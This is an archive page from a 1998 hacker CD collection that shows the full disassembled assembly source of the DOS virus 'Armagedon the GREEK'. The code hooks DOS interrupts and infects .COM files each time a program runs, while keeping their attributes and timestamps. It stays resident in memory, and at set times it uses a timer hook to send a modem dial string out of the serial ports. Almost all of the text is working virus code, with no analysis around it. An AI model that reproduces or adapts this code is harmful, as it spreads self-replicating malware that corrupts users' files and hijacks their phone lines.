The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / pc / virus / armagedo.asm < prev next >

Wrap

Assembly Source File | 2003-06-11 | 13.1 KB | 596 lines

PAGE 59,132 ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ ARMAGEDO ██ ;██ ██ ;██ Created: 21-Feb-91 ██ ;██ Version: ██ ;██ Passes: 5 Analysis Options on: H ██ ;██ ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ data_1e equ 2Ch ; (7415:002C=0) data_2e equ 81h ; (7415:0081=0) seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h armagedo proc far start: jmp loc_36 ; (0436) armagedo endp ;██████████████████████████████████████████████████████████████████████████ ; ; External Entry Point ; ;██████████████████████████████████████████████████████████████████████████ int_21h_entry proc far pushf ; Push flags cmp ah,0E0h jne loc_2 ; Jump if not equal mov ax,0DADAh popf ; Pop flags iret ; Interrupt return int_21h_entry endp loc_2: cmp ah,0E1h jne loc_3 ; Jump if not equal mov ax,cs popf ; Pop flags iret ; Interrupt return loc_3: cmp ax,4B00h je loc_5 ; Jump if equal loc_4: popf ; Pop flags jmp dword ptr cs:data_4 ; (7415:0122=138Dh) data_4 dd 7415138Dh data_6 dd 7415022Bh data_8 db 0 data_9 db 8 data_10 db 10h data_11 db 9 data_12 db 34h data_13 dw 0 db 0 data_14 db 0 data_15 db 0 data_16 db 0 db 43h, 4Fh, 4Dh data_17 dw 5 data_18 dw 2 db 0, 0 data_19 dw 1301h data_20 dw 1306h data_21 dw 0FFFEh data_22 dw 7415h data_23 dw 3D5Bh data_24 dw 20h data_25 dw 0EC2h data_26 dw 6E68h db 0, 0, 81h, 0 data_27 dw 12ACh db 5Ch, 0 data_28 dw 12ACh db 6Ch, 0 data_29 dw 12ACh loc_5: push ds push bx push si push cx push ax push dx push bp push es push di cld ; Clear direction push dx push ds xor cx,cx ; Zero register mov si,dx loc_6: mov al,[si] cmp al,0 je loc_7 ; Jump if equal inc cx inc si jmp short loc_6 ; (016C) loc_7: add dx,cx sub dx,3 mov si,135h mov di,dx cmp byte ptr [di-3],4Eh ; 'N' jne loc_8 ; Jump if not equal cmp byte ptr [di-2],44h ; 'D' je loc_11 ; Jump if equal loc_8: mov cx,3 locloop_9: mov al,cs:[si] cmp al,[di] jne loc_11 ; Jump if not equal inc si inc di loop locloop_9 ; Loop if cx > 0 pop ds pop dx push dx push ds mov si,dx mov dl,0 cmp byte ptr [si+1],3Ah ; ':' jne loc_10 ; Jump if not equal mov dl,[si] and dl,0Fh loc_10: mov ah,36h ; '6' int 21h ; DOS Services ah=function 36h ; get free space, drive dl,1=a: cmp ax,0FFFFh je loc_11 ; Jump if equal jmp short loc_13 ; (01C5) db 90h loc_11: jmp loc_19 ; (02F8) jmp loc_20 ; (02FD) loc_12: jmp loc_17 ; (02C4) jmp loc_18 ; (02CF) loc_13: cmp bx,3 jb loc_11 ; Jump if below pop ds pop dx push ds push dx mov cs:data_22,ds ; (7415:0144=7415h) mov cs:data_23,dx ; (7415:0146=3D5Bh) mov ax,4300h int 21h ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx mov cs:data_24,cx ; (7415:0148=20h) mov ax,4301h xor cx,cx ; Zero register int 21h ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx mov bx,0FFFFh mov ah,48h ; 'H' int 21h ; DOS Services ah=function 48h ; allocate memory, bx=bytes/16 mov ah,48h ; 'H' int 21h ; DOS Services ah=function 48h ; allocate memory, bx=bytes/16 mov cs:data_19,ax ; (7415:013E=1301h) mov ax,cs mov ds,ax mov dx,541h mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx pop dx pop ds mov ax,3D02h clc ; Clear carry flag int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx jc loc_12 ; Jump if carry Set mov bx,ax mov cs:data_17,ax ; (7415:0138=5) mov cx,0FFFFh mov ax,cs:data_19 ; (7415:013E=1301h) mov ds,ax mov dx,437h mov ah,3Fh ; '?' clc ; Clear carry flag int 21h ; DOS Services ah=function 3Fh ; read file, cx=bytes, to ds:dx jc loc_12 ; Jump if carry Set mov cs:data_18,ax ; (7415:013A=2) cmp ax,0E000h ja loc_12 ; Jump if above cmp ax,437h jb loc_15 ; Jump if below mov si,438h add si,si sub si,15h mov cx,13h mov di,524h locloop_14: mov al,[si] mov ah,cs:[di] cmp ah,al jne loc_15 ; Jump if not equal inc si inc di loop locloop_14 ; Loop if cx > 0 jmp short loc_17 ; (02C4) db 90h loc_15: mov ax,4200h mov bx,cs:data_17 ; (7415:0138=5) xor cx,cx ; Zero register mov dx,cx int 21h ; DOS Services ah=function 42h ; move file ptr, cx,dx=offset jc loc_17 ; Jump if carry Set mov si,100h mov cx,437h xor di,di ; Zero register mov ax,cs:data_19 ; (7415:013E=1301h) mov ds,ax locloop_16: mov al,cs:[si] mov [di],al inc si inc di loop locloop_16 ; Loop if cx > 0 mov ax,5700h mov bx,cs:data_17 ; (7415:0138=5) int 21h ; DOS Services ah=function 57h ; get/set file date & time mov cs:data_26,cx ; (7415:014C=6E68h) mov cs:data_25,dx ; (7415:014A=0EC2h) mov ax,cs:data_19 ; (7415:013E=1301h) mov ds,ax mov si,437h mov al,[si] add al,0Bh mov [si],al xor dx,dx ; Zero register mov cx,cs:data_18 ; (7415:013A=2) add cx,437h mov bx,cs:data_17 ; (7415:0138=5) mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx mov cx,cs:data_26 ; (7415:014C=6E68h) mov dx,cs:data_25 ; (7415:014A=0EC2h) mov bx,cs:data_17 ; (7415:0138=5) mov ax,5701h int 21h ; DOS Services ah=function 57h ; get/set file date & time loc_17: mov bx,cs:data_17 ; (7415:0138=5) mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_18: mov dx,80h mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx mov ax,cs:data_19 ; (7415:013E=1301h) mov es,ax mov ah,49h ; 'I' int 21h ; DOS Services ah=function 49h ; release memory block, es=seg mov ax,cs:data_22 ; (7415:0144=7415h) mov ds,ax mov dx,cs:data_23 ; (7415:0146=3D5Bh) mov ax,4301h mov cx,cs:data_24 ; (7415:0148=20h) int 21h ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx jmp short loc_20 ; (02FD) db 90h loc_19: pop ds pop dx jmp short loc_20 ; (02FD) db 90h loc_20: pop di pop es pop bp pop dx pop ax pop cx pop si pop bx pop ds jmp loc_4 ; (011C) ;██████████████████████████████████████████████████████████████████████████ ; ; External Entry Point ; ;██████████████████████████████████████████████████████████████████████████ int_08h_entry proc far push bp push ds push es push ax push bx push cx push dx push si push di pushf ; Push flags call cs:data_6 ; (7415:0126=22Bh) call sub_1 ; (0365) push cs pop ds mov ah,5 mov ch,data_10 ; (7415:012C=10h) cmp ah,ch ja loc_22 ; Jump if above mov ah,6 cmp ah,ch jb loc_22 ; Jump if below mov ah,data_8 ; (7415:012A=0) cmp ah,1 je loc_21 ; Jump if equal mov ah,1 mov data_8,ah ; (7415:012A=0) jmp short loc_22 ; (035B) db 90h loc_21: call sub_2 ; (03CB) inc data_13 ; (7415:012F=0) mov ax,data_13 ; (7415:012F=0) cmp ax,21Ch jne loc_22 ; Jump if not equal xor ax,ax ; Zero register mov data_8,ah ; (7415:012A=0) mov data_13,ax ; (7415:012F=0) mov data_15,ah ; (7415:0133=0) loc_22: pop di pop si pop dx pop cx pop bx pop ax pop es pop ds pop bp iret ; Interrupt return int_08h_entry endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_1 proc near push cs pop ds xor al,al ; Zero register mov ah,data_9 ; (7415:012B=8) cmp ah,11h jne loc_26 ; Jump if not equal mov ah,data_12 ; (7415:012E=34h) cmp ah,3Bh ; ';' jne loc_27 ; Jump if not equal mov ah,data_11 ; (7415:012D=9) cmp ah,3Bh ; ';' jne loc_28 ; Jump if not equal mov ah,data_10 ; (7415:012C=10h) cmp ah,17h jne loc_29 ; Jump if not equal mov data_10,al ; (7415:012C=10h) loc_23: mov data_11,al ; (7415:012D=9) loc_24: mov data_12,al ; (7415:012E=34h) loc_25: mov data_9,al ; (7415:012B=8) retn loc_26: inc data_9 ; (7415:012B=8) retn loc_27: inc data_12 ; (7415:012E=34h) jmp short loc_25 ; (0396) loc_28: inc data_11 ; (7415:012D=9) jmp short loc_24 ; (0393) loc_29: inc data_10 ; (7415:012C=10h) jmp short loc_23 ; (0390) sub_1 endp db '+++aTh0m0s7=35dp081,,,,141' ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_2 proc near mov al,data_15 ; (7415:0133=0) cmp al,1 je loc_ret_35 ; Jump if equal mov al,data_16 ; (7415:0134=0) cmp al,1 je loc_31 ; Jump if equal mov cx,3 locloop_30: mov dx,cx xor ah,ah ; Zero register mov al,83h int 14h ; RS-232 dx=com#, ah=func 40h ; reset port, al=init parameter loop locloop_30 ; Loop if cx > 0 mov al,1 mov data_16,al ; (7415:0134=0) jmp short loc_ret_35 ; (0435) db 90h loc_31: push cs pop ds mov si,3B1h mov al,data_14 ; (7415:0132=0) cmp al,1Ah jne loc_32 ; Jump if not equal jmp short loc_33 ; (041A) db 90h loc_32: xor ah,ah ; Zero register add si,ax mov al,[si] mov dx,3F8h out dx,al ; port 3F8h, RS232-1 xmit buffr mov dx,2F8h out dx,al ; port 2F8h, RS232-2 xmit buffr mov dx,2E8h out dx,al ; port 2E8h mov dx,3E8h out dx,al ; port 3E8h inc data_14 ; (7415:0132=0) jmp short loc_ret_35 ; (0435) db 90h loc_33: mov cx,3 locloop_34: mov dx,cx mov al,0Dh mov ah,1 int 14h ; RS-232 dx=com#, ah=func 41h ; write char al, ah=retn status loop locloop_34 ; Loop if cx > 0 mov ax,1 mov data_15,al ; (7415:0133=0) mov data_14,ah ; (7415:0132=0) mov data_16,ah ; (7415:0134=0) loc_ret_35: retn sub_2 endp loc_36: mov ah,0E0h int 21h ; DOS Services ah=function E0h cmp ax,0DADAh jne loc_37 ; Jump if not equal jmp loc_40 ; (04DB) loc_37: push cs pop ds mov ax,3521h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov word ptr data_4,bx ; (7415:0122=138Dh) mov word ptr data_4+2,es ; (7415:0124=7415h) mov dx,103h mov ax,2521h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx mov ax,3508h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov word ptr data_6,bx ; (7415:0126=22Bh) mov word ptr data_6+2,es ; (7415:0128=7415h) mov dx,309h mov ax,2508h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx mov ah,2Ch ; ',' int 21h ; DOS Services ah=function 2Ch ; get time, cx=hrs/min, dh=sec mov data_10,ch ; (7415:012C=10h) mov data_11,cl ; (7415:012D=9) mov data_12,dh ; (7415:012E=34h) mov ax,cs:data_1e ; (7415:002C=0) mov ds,ax xor si,si ; Zero register loc_38: mov al,[si] cmp al,1 je loc_39 ; Jump if equal inc si jmp short loc_38 ; (0486) loc_39: inc si inc si mov dx,si mov ax,cs mov es,ax mov bx,5Ah mov ah,4Ah ; 'J' int 21h ; DOS Services ah=function 4Ah ; change mem allocation, bx=siz mov bx,cs:data_2e ; (7415:0081=0) mov ax,cs mov es,ax mov cs:data_28,ax ; (7415:0156=12ACh) mov cs:data_29,ax ; (7415:015A=12ACh) mov cs:data_27,ax ; (7415:0152=12ACh) mov ax,4B00h mov cs:data_20,ss ; (7415:0140=1306h) mov cs:data_21,sp ; (7415:0142=0FFFEh) pushf ; Push flags call cs:data_4 ; (7415:0122=138Dh) mov ax,cs:data_20 ; (7415:0140=1306h) mov ss,ax mov ax,cs:data_21 ; (7415:0142=0FFFEh) mov sp,ax mov ax,cs mov ds,ax mov dx,537h int 27h ; Terminate & stay resident loc_40: mov ah,0E1h int 21h ; DOS Services ah=function E1h mov si,4F3h mov cs:[si+3],ax mov ax,4F8h mov cs:[si+1],ax mov ax,cs:data_18 ; (7415:013A=2) mov bx,cs ;* jmp far ptr loc_1 ;*(0000:0000) db 0EAh, 0, 0, 0, 0 db 8Bh, 0C8h, 8Eh, 0DBh, 0BEh, 0 db 1, 0BFh, 37h, 5 locloop_41: mov al,[di] mov [si],al inc si inc di loop locloop_41 ; Loop if cx > 0 mov si,51Fh mov cs:[si+3],ds mov al,byte ptr ds:[100h] ; (7415:0100=0E9h) sub al,0Bh mov byte ptr ds:[100h],al ; (7415:0100=0E9h) mov ax,ds mov es,ax mov ss,ax jmp far ptr start ; (0100) db 'Armagedon the GREEK' db 0D8h, 20h seg_a ends end start